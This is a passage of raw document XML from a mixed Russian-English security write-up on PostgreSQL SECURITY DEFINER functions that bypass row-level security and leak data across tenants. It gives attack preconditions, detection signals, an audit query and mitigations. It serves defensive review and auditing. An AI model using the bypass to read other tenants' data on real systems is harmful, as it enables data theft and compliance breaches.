      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE status = p_status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND tenant_id = caller_tenant;  -- ← explicit filter</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Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">explicit re-implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RLS policy внутри функции. Pattern для случаев, где FORCE RLS не подходит (например, функция должна делать cross-tenant operations для admin-roles но не для regular tenants).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уровень 3 — SECURITY INVOKER вместо SECURITY DEFINER (когда возможно):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE FUNCTION app.get_order_summary_v3(p_status text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS TABLE(total_count bigint, total_amount numeric)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- НЕТ SECURITY DEFINER → SECURITY INVOKER (default)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AS $$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE status = p_status;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END;</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY INVOKER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default) — функция исполняется под current_user, RLS применяется normally. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">самый безопасный default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. SECURITY DEFINER нужен только когда функция legitimately должна elevate privileges (audit-trail wrappers, controlled DDL operations).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Edge case — SECURITY INVOKER + bypassrls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL имеет атрибут </w:t>
      </w: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 на роли (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE bypass_role BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Если SD-функция OWNED by role с BYPASSRLS, она ведёт себя как superuser в context RLS. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">дополнительный source RLS bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ortogonal к SECURITY DEFINER.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit query:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- SD-функции, owner которых имеет BYPASSRLS или superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT n.nspname, p.proname, r.rolname,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       r.rolsuper, r.rolbypassrls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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JOIN pg_roles r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND (r.rolsuper = true OR r.rolbypassrls = true);</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Cross-tenant data exfiltration — atomistic per-call (1 function call leaks aggregate over all tenants) или per-row (direct row access bypass tenant policy). Severity критична для multi-tenant — direct compliance violation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Артефакты атаки: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SECURITY DEFINER функции, читающие RLS-protected tables, вызванные от non-DBA tenant roles в large volume — поведенческий сигнал.</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audit: SD-функции, owner которых superuser ИЛИ BYPASSRLS, читающие RLS-tables.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Application audit: aggregate stats возвращают «too much» — больше rows/sums чем должно быть для tenant.</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Three independent design decisions PostgreSQL:</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SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> переключает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на owner функции — documented.</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RLS bypass для owner таблицы / superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — by default (без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Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Row Security Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">): *"Superusers and roles with the BYPASSRLS attribute always bypass the row security system when accessing a table. Table owners normally bypass row security as well, though a table owner can choose to be subject to row security with ALTER TABLE ... FORCE ROW LEVEL SECURITY."*</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SD-функция исполняется под owner-context для всех internal queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — соответственно RLS bypass propagates через function body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание: SD-функция от superuser-owner — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">automatic RLS-bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для всех таблиц, owned by её owner (или any superuser). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">намеренное поведение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы делать audit-trail/admin-style functions работающими. Bug — когда разработчик создаёт такую функцию и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT EXECUTE даёт обычным tenants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Защита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 explicit filter + SECURITY INVOKER default) — основная mitigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit всех SD-функций в production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обязательная часть security review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к среде.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Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> все версии (RLS существует с PG 9.5, 2016; SECURITY DEFINER с очень ранних).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атакующего:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXECUTE на SD-функцию (часто дан PUBLIC или application-role).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Привилегия owner функции:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> superuser, table owner, или BYPASSRLS role.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Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SD-функция OR table without FORCE ROW LEVEL SECURITY OR no explicit filter inside function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SECURITY DEFINER функции legitimately используются для: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Audit logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: функция пишет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">audit_log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> независимо от caller's permissions.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Controlled DDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tenant management functions для creating per-tenant schemas.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Permission delegation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
